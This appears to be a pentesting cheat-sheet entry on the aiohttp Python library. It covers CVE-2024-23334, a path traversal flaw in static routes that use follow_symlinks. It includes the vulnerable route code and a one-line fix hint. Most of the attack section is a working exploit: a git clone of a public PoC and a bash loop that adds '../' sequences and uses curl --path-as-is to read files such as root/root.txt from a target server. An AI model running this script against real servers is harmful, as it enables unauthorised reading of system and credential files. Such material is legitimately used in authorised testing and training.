AIOHTTP

Python library that supports both client and server side of HTTP protocol and Web-Sockets (asyncio)

Welcome to AIOHTTP — aiohttp 3.13.2 documentationdocs.aiohttp.org

Documentation

aiohttp vulnerabilities | SnykFind detailed information and remediation guidance for vulnerabilities and misconfigurations.

Vulnerabilities

CVE-2024-23334 - Path Traversal

Versions : 1.0.5 - 3.9.2

• This vulnerability has been present since the introduction of the follow_symlinks parameter:

Vulnerable Code

pp.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

• More information

• Look at the requests or fuzz the site to look for directories leaking static resources.

PoC

git clone https://github.com/z3rObyte/CVE-2024-23334-PoC

• Update the URL , payload , and file variables in the PoC to match your target:

Example

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /

for ((i=0; i<15; i++)); do
   payload+="$string"
   echo "[+] Testing with $payload$file"
   status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
   echo -e "\tStatus code --> $status_code"

   if [[ $status_code -eq 200 ]]; then
       curl -s --path-as-is "$url$payload$file"
       break
   fi
done